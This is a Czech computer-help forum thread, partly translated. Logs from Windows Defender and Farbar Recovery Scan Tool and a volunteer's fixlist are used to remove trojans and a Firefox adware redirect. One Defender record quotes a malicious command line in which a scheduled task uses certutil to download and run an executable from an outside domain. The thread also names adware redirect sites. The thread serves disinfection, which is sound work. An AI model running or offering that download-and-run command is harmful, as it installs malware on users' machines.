Date: 2020-08-29 22:36:38.513
Description:
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Hynamer.C!ml
ID: 2147749152
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\Milan\AppData\Roaming\3k52z4f5aim\et53zradlff.exe
Původ detekce: Místní počítač
Typ detekce: FastPath
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5

Date: 2020-08-29 22:36:38.510
Description:
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Wacatac.DB!ml
ID: 2147757790
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\Milan\AppData\Local\Temp\lttfjp4yc3u\vujrxhyhkrm.exe
Původ detekce: Místní počítač
Typ detekce: FastPath
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5

Date: 2020-08-29 22:36:38.508
Description:
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Cryptinject!MTB
ID: 2147729037
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\Milan\AppData\Local\Temp\dzekzdxxrlm\ifhvvyy.exe; file:_C:\Users\Milan\AppData\Local\Temp\r04v3ss32nl\ifhvvyy.exe
Původ detekce: Místní počítač
Typ detekce: FastPath
Zdroj detekce: Ochrana v reálném čase
Uživatel: DESKTOP-AJHPLSQ\Milan
Název procesu: C:\Program Files (x86)\oizjd\53280214.exe
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5

Date: 2020-08-29 22:35:50.832
Description:
Antivirová ochrana v programu Windows Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Ceprolad.A
ID: 2147726914
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f https://bbistrovantonbb.com/app/app.exe C:\Users\Milan\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Milan\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.323.90.0, AS: 1.323.90.0, NIS: 1.323.90.0
Verze modulu: AM: 1.1.17400.5, NIS: 1.1.17400.5

CodeIntegrity:
===================================

Date: 2020-09-12 11:45:27.046
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.

Date: 2020-09-12 11:45:26.975
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.

Date: 2020-09-12 11:45:26.852
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.

Date: 2020-09-12 11:45:26.713
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.

Date: 2020-09-12 10:45:41.032
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.

Date: 2020-09-12 10:45:26.797
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.

Date: 2020-09-12 10:45:26.788
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.

Date: 2020-09-12 10:45:26.504
Description:
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files (x86)\AVG\Browser\Application\AVGBrowser.exe) attempted to load \Device\HarddiskVolume2\Program Files\AVG\Antivirus\aswhook.dll that did not meet the Microsoft signing level requirements.

==================== Memory info ===========================

BIOS: Award Software International, Inc. F3 07/28/2010
Motherboard: Gigabyte Technology Co., Ltd. GA-770T-D3L
Processor: AMD Athlon(tm) II X2 250 Processor
Percentage of memory in use: 32%
Total physical RAM: 12285.55 MB
Available physical RAM: 8233.7 MB
Total Virtual: 14141.55 MB
Available Virtual: 8472.37 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:476.31 GB) (Free:278 GB) NTFS
Drive e: (HDD-1000) (Fixed) (Total:931.51 GB) (Free:737.23 GB) NTFS
Drive f: (ZelenyHDD) (Fixed) (Total:465.76 GB) (Free:28.95 GB) NTFS
Drive g: (Car Mechanic Simulator 2018 Merc) (CDROM) (Total:7.51 GB) (Free:0 GB) UDF

\\?\Volume{5d2f0ce6-0000-0000-0000-100000000000}\ (Rezervováno systémem) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
\\?\Volume{5d2f0ce6-0000-0000-0000-101a77000000}\ () (Fixed) (Total:0.53 GB) (Free:0.08 GB) NTFS

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 476.9 GB) (Disk ID: 5D2F0CE6)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=476.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=543 MB) - (Type=27)

==========================================================
Disk: 1 (Size: 931.5 GB) (Disk ID: 8C19AC0D)

Partition: GPT.

==========================================================
Disk: 2 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: BFAA9354)
Partition 1: (Active) - (Size=465.8 GB) - (Type=07 NTFS)

==================== End of Addition.txt =======================

Re: tabs with ads keep popping up

Posted: 12 Sep 2020 11:42
by Rudy
Open Notepad and copy the following into it:
Start

CloseProcesses:
FirewallRules: [TCP Query User{F4F5C31D-2AD9-4221-AC18-FD1AD4803957}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [UDP Query User{7D5CA960-632A-4490-90D3-4E2015621578}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [TCP Query User{3382E28A-DDFD-4360-9788-92E872305F04}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [UDP Query User{6D1B39C0-8474-4A82-A16B-37A2B363067E}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
C:\Program Files\M3PY0PHHS
C:\Users\Milan\AppData\Local\Temp
C:\Users\Milan\AppData\Roaming\3k52z4f5aim\et53zradlff.exe
C:\Users\Milan\AppData\Local\Temp\r04v3ss32nl\ifhvvyy.exe
C:\Program Files (x86)\oizjd
C:\Windows\System32\schtasks.exe
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\MountPoints2: {4f53bf88-6b63-11ea-bac1-1c6f6553bf1c} - "G:\setup.exe"
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AnyDesk.lnk
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
R1 0246CDED558E; C:\WINDOWS\0246CDED558E.sys [25368 2020-08-29] (大连纵梦网络科技有限公司 -> FsFilter Network) [File not signed]

EmptyTemp:
End
Save it to the desktop as fixlist.txt. Run FRST again and click >Fix<. When it finishes, a log will appear; copy it here.

Re: tabs with ads keep popping up

Posted: 12 Sep 2020 12:14
by martybx
log:


Fix result of Farbar Recovery Scan Tool (x64) Version: 12-09-2020
Ran by Milan (12-09-2020 13:11:08) Run:2
Running from C:\Users\Milan\Desktop
Loaded Profiles: Milan
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start

CloseProcesses:
FirewallRules: [TCP Query User{F4F5C31D-2AD9-4221-AC18-FD1AD4803957}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [UDP Query User{7D5CA960-632A-4490-90D3-4E2015621578}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [TCP Query User{3382E28A-DDFD-4360-9788-92E872305F04}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
FirewallRules: [UDP Query User{6D1B39C0-8474-4A82-A16B-37A2B363067E}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe => No File
C:\Program Files\M3PY0PHHS
C:\Users\Milan\AppData\Local\Temp
C:\Users\Milan\AppData\Roaming\3k52z4f5aim\et53zradlff.exe
C:\Users\Milan\AppData\Local\Temp\r04v3ss32nl\ifhvvyy.exe
C:\Program Files (x86)\oizjd
C:\Windows\System32\schtasks.exe
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\...\MountPoints2: {4f53bf88-6b63-11ea-bac1-1c6f6553bf1c} - "G:\setup.exe"
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AnyDesk.lnk
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
R1 0246CDED558E; C:\WINDOWS\0246CDED558E.sys [25368 2020-08-29] (大连纵梦网络科技有限公司 -> FsFilter Network) [File not signed]

EmptyTemp:
End
*****************

Processes closed successfully.
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{F4F5C31D-2AD9-4221-AC18-FD1AD4803957}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{7D5CA960-632A-4490-90D3-4E2015621578}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{3382E28A-DDFD-4360-9788-92E872305F04}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{6D1B39C0-8474-4A82-A16B-37A2B363067E}C:\program files (x86)\java\jre1.8.0_241\bin\javaw.exe" => removed successfully
"C:\Program Files\M3PY0PHHS" => not found
C:\Users\Milan\AppData\Local\Temp => moved successfully
"C:\Users\Milan\AppData\Roaming\3k52z4f5aim\et53zradlff.exe" => not found
"C:\Users\Milan\AppData\Local\Temp\r04v3ss32nl\ifhvvyy.exe" => not found
C:\Program Files (x86)\oizjd => moved successfully
"C:\Windows\System32\schtasks.exe" => not found
HKU\S-1-5-21-1738925715-1269715944-3180472622-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{4f53bf88-6b63-11ea-bac1-1c6f6553bf1c} => removed successfully
"Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AnyDesk.lnk" => not found
HKLM\SOFTWARE\Policies\Mozilla => removed successfully
0246CDED558E => Unable to stop service.
HKLM\System\CurrentControlSet\Services\0246CDED558E => could not remove, key could be protected

=========== EmptyTemp: ==========

BITS transfer queue => 7888896 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 15081698 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 0 B
Edge => 0 B
Chrome => 0 B
Firefox => 145067946 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 7610 B
NetworkService => 7610 B
Milan => 3938407 B

RecycleBin => 0 B
EmptyTemp: => 164 MB temporary data Removed.

================================

Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 12-09-2020 13:12:27)


Result of scheduled keys to remove after reboot:

HKLM\System\CurrentControlSet\Services\0246CDED558E => could not remove, key could be protected

==== End of Fixlog 13:12:27 ====

Re: tabs with ads keep popping up

Posted: 12 Sep 2020 14:58
by Rudy
OK. Has anything changed now?

Re: tabs with ads keep popping up

Posted: 12 Sep 2020 21:46
by martybx
Unfortunately not, the tabs keep popping up..
4 tabs within two minutes

Re: tabs with ads keep popping up

Posted: 13 Sep 2020 10:15
by Rudy
Something is probably coming back. Does it happen in all browsers, or only in a particular one?

Re: tabs with ads keep popping up

Posted: 13 Sep 2020 10:40
by martybx
I have 3 browsers:
EDGE: doesn't do it
AVG Secure Browser: doesn't do it
Unfortunately I do everything in Mozilla Firefox and would like to keep using it, and there it keeps popping up.
A new tab pops up and for a second it shows this:
blob:https://pwz2.com/a8dd295b-a42d-4565-8253-09d24f59f29f
and it switches me to that tab and suddenly I'm on:
https://shoppingwaves.net/

Re: tabs with ads keep popping up

Posted: 13 Sep 2020 11:40
by Rudy
OK. Back up FF using MozBackup: https://www.slunecnice.cz/sw/mozbackup/ . Then uninstall FF completely, including its profile (the Mozilla subdirectories in c:\users\Milan\appdata\local, c:\users\Milan\appdata\roaming, c:\users\Milan\data aplikací, c:\users\Milan\local settings and in c:\program data must be deleted). Reinstall FF and copy back only the bookmarks and passwords from the backup.

Re: tabs with ads keep popping up

Posted: 13 Sep 2020 12:57
by martybx
Everything has been wiped and so far, knock on wood, it's quiet....
Is there anything else that needs checking, or is it now the so-called "waiting phase"?

Re: tabs with ads keep popping up

Posted: 13 Sep 2020 14:35
by Rudy
Better to keep "watching what happens" for a while longer.

Re: tabs with ads keep popping up

Posted: 13 Sep 2020 19:33
by martybx
Yes, we will keep watching..
PS: As a thank-you, a small contribution has been sent to you.
Have a nice day and thank you

Re: tabs with ads keep popping up

Posted: 13 Sep 2020 19:50
by Rudy
A nice day to you too, and you're welcome! :) Thank you for the contribution.